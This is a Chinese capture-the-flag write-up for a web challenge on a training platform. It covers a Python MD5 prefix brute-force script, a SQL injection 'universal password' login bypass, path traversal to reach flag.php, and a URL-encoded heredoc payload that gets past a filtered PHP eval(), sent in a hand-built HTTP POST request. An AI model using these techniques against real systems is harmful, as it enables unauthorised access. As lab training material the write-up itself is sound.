进去md5碰撞,贴一下脚本代码
import hashlib
def md5(value):
return hashlib.md5(str(value).encode("utf-8")).hexdigest()
for i in range(1,9999999):
if (md5(i)[0:6] =="f5ce8c"):
print(i)
break
登录处存在SQL注入,直接万能密码就能登录。登录后给了三个文件,提示flag在根目录下,点开a.php的同时我们抓包,自己尝试了许多路径,最接近的是改成f=/var/www/html/../flag.php,也没用。真正的路径是/var/www/html/Challenges/flag.php我就在想这些大师傅都是怎么想到的。
访问得到源码。
<?php
//POST方式提交参数flag
$f = $_POST['flag'];
//将得到的flag参数中的一些字符去掉
$f = str_replace(array('`', '$', '*', '#', ':', '\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
//flag参数满足长度大于13或者flag参数中有return两个条件中的一个则输出
{
die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try//这里用到了异常处理,先执行try中的语句,有异常则执行catch中的语句
{
eval("$spaceone = $f");
}
catch (Exception $e)
{
return false;
}
if ($spaceone === 'flag'){//如果spaceone变量等于字符串flag,则输出helloctf.php文件中的内容
echo file_get_contents("helloctf.php");
}
?>
满足$spaceone === 'flag'。而$spaceone = $f,$f可控,那么我们用post方式提交flag=flag,但是并没有拿到flag。其实这里是触发了异常处理,eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。这里我们在post的时候加个分号拿到flag。
这里还可以使用PHP的另一种字符串构造方法<<<自定义定界符
<<<selfDefineDelimiter
your string
selfDefineDelimiter
因为有换行的存在,我们要把上面所有的字符都进行url编码,然后在burp上构造post参数flag,对照ASCII码表进行手动编码:
<<<a
flag
a;
%3c%3c%3c61%0a
%66%6c%61%67%0a
%61%3b%0a
%3c%3c%3c61%0a%66%6c%61%67%0a%61
请求也需要我们自己构造:注意:Content-Type字段的值
POST /Challenges/flag.php HTTP/1.1
Host:8a855db687b64c05b02efc0fa87b4fa1f11579a7eb864268.game.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
flag=%3c%3c%3c%61%0a%66%6c%61%67%0a%61%3b%0a